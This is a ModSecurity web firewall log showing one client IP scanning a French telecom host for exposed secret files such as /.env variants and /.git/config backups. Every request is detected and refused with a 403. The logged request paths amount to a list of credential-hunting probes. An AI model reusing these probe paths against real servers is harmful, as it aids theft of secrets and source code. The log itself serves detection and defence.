[Mon May 11 20:55:56.480049 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.docker.dev"] [unique_id "agImPFNddpkriGUb6ZV20wAAARg"]
[Mon May 11 20:55:56.480265 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.docker.dev"] [unique_id "agImPFNddpkriGUb6ZV20wAAARg"]
[Mon May 11 20:55:56.480473 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.docker.dev"] [unique_id "agImPFNddpkriGUb6ZV20wAAARg"]
[Mon May 11 20:55:56.498543 2026] [security2:error] [pid 1534836:tid 1534892] [client 195.178.110.199:36132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.swp"] [unique_id "agImPNeaRXe5lR8y0ZOS1AAAAVU"]
[Mon May 11 20:55:56.498718 2026] [security2:error] [pid 1534836:tid 1534892] [client 195.178.110.199:36132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.swp"] [unique_id "agImPNeaRXe5lR8y0ZOS1AAAAVU"]
[Mon May 11 20:55:56.499222 2026] [security2:error] [pid 1534836:tid 1534892] [client 195.178.110.199:36132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.swp"] [unique_id "agImPNeaRXe5lR8y0ZOS1AAAAVU"]
[Mon May 11 20:55:56.502665 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.test"] [unique_id "agImPJYn-x0CHsbEbP2tvAAAAIo"]
[Mon May 11 20:55:56.502831 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.test"] [unique_id "agImPJYn-x0CHsbEbP2tvAAAAIo"]
[Mon May 11 20:55:56.503021 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.test"] [unique_id "agImPJYn-x0CHsbEbP2tvAAAAIo"]
[Mon May 11 20:55:56.519643 2026] [security2:error] [pid 1534836:tid 1534892] [client 195.178.110.199:36132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env~"] [unique_id "agImPNeaRXe5lR8y0ZOS1QAAAVU"]
[Mon May 11 20:55:56.519821 2026] [security2:error] [pid 1534836:tid 1534892] [client 195.178.110.199:36132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env~"] [unique_id "agImPNeaRXe5lR8y0ZOS1QAAAVU"]
[Mon May 11 20:55:56.520005 2026] [security2:error] [pid 1534836:tid 1534892] [client 195.178.110.199:36132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env~"] [unique_id "agImPNeaRXe5lR8y0ZOS1QAAAVU"]
[Mon May 11 20:55:56.529303 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.int"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.int"] [unique_id "agImPDP5Q_-MBliRCAxnaAAAABg"]
[Mon May 11 20:55:56.529490 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.int"] [unique_id "agImPDP5Q_-MBliRCAxnaAAAABg"]
[Mon May 11 20:55:56.529689 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.int"] [unique_id "agImPDP5Q_-MBliRCAxnaAAAABg"]
[Mon May 11 20:55:56.584263 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.178.110.199:36098] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agImPDP5Q_-MBliRCAxnaQAAABY"]
[Mon May 11 20:55:56.584558 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.178.110.199:36098] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agImPDP5Q_-MBliRCAxnaQAAABY"]
[Mon May 11 20:55:56.584823 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.178.110.199:36098] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agImPDP5Q_-MBliRCAxnaQAAABY"]
[Mon May 11 20:55:56.584993 2026] [security2:error] [pid 1516058:tid 1516114] [client 195.178.110.199:36174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.php"] [unique_id "agImPCMeXtzav-mi9SyxnQAAANg"]
[Mon May 11 20:55:56.585198 2026] [security2:error] [pid 1516058:tid 1516114] [client 195.178.110.199:36174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.php"] [unique_id "agImPCMeXtzav-mi9SyxnQAAANg"]
[Mon May 11 20:55:56.585414 2026] [security2:error] [pid 1516058:tid 1516114] [client 195.178.110.199:36174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.php"] [unique_id "agImPCMeXtzav-mi9SyxnQAAANg"]
[Mon May 11 20:55:56.587115 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/"] [unique_id "agImPPjVc-A-CSptvm1xdAAAAFE"]
[Mon May 11 20:55:56.587299 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/"] [unique_id "agImPPjVc-A-CSptvm1xdAAAAFE"]
[Mon May 11 20:55:56.587500 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/"] [unique_id "agImPPjVc-A-CSptvm1xdAAAAFE"]
[Mon May 11 20:55:56.596269 2026] [security2:error] [pid 1501883:tid 1501887] [client 195.178.110.199:36178] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agImPDP5Q_-MBliRCAxnagAAAAI"]
[Mon May 11 20:55:56.596457 2026] [security2:error] [pid 1501883:tid 1501887] [client 195.178.110.199:36178] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agImPDP5Q_-MBliRCAxnagAAAAI"]
[Mon May 11 20:55:56.596665 2026] [security2:error] [pid 1501883:tid 1501887] [client 195.178.110.199:36178] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agImPDP5Q_-MBliRCAxnagAAAAI"]
[Mon May 11 20:55:56.602058 2026] [security2:error] [pid 1516058:tid 1516114] [client 195.178.110.199:36174] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/commit_editmsg"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agImPCMeXtzav-mi9SyxngAAANg"]
[Mon May 11 20:55:56.602236 2026] [security2:error] [pid 1516058:tid 1516114] [client 195.178.110.199:36174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agImPCMeXtzav-mi9SyxngAAANg"]
[Mon May 11 20:55:56.602406 2026] [security2:error] [pid 1516058:tid 1516114] [client 195.178.110.199:36174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agImPCMeXtzav-mi9SyxngAAANg"]
[Mon May 11 20:55:56.604178 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agImPPjVc-A-CSptvm1xdQAAAFE"]
[Mon May 11 20:55:56.604332 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agImPPjVc-A-CSptvm1xdQAAAFE"]
[Mon May 11 20:55:56.604503 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agImPPjVc-A-CSptvm1xdQAAAFE"]
[Mon May 11 20:55:56.618894 2026] [security2:error] [pid 1516058:tid 1516114] [client 195.178.110.199:36174] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config.bak"] [unique_id "agImPCMeXtzav-mi9SyxnwAAANg"]
[Mon May 11 20:55:56.619024 2026] [security2:error] [pid 1516058:tid 1516114] [client 195.178.110.199:36174] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config.bak"] [unique_id "agImPCMeXtzav-mi9SyxnwAAANg"]
[Mon May 11 20:55:56.619184 2026] [security2:error] [pid 1516058:tid 1516114] [client 195.178.110.199:36174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config.bak"] [unique_id "agImPCMeXtzav-mi9SyxnwAAANg"]
[Mon May 11 20:55:56.619359 2026] [security2:error] [pid 1516058:tid 1516114] [client 195.178.110.199:36174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config.bak"] [unique_id "agImPCMeXtzav-mi9SyxnwAAANg"]
[Mon May 11 20:55:56.620797 2026] [security2:error] [pid 1516058:tid 1516102] [client 195.178.110.199:36068] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config.old"] [unique_id "agImPCMeXtzav-mi9SyxoAAAAMw"]
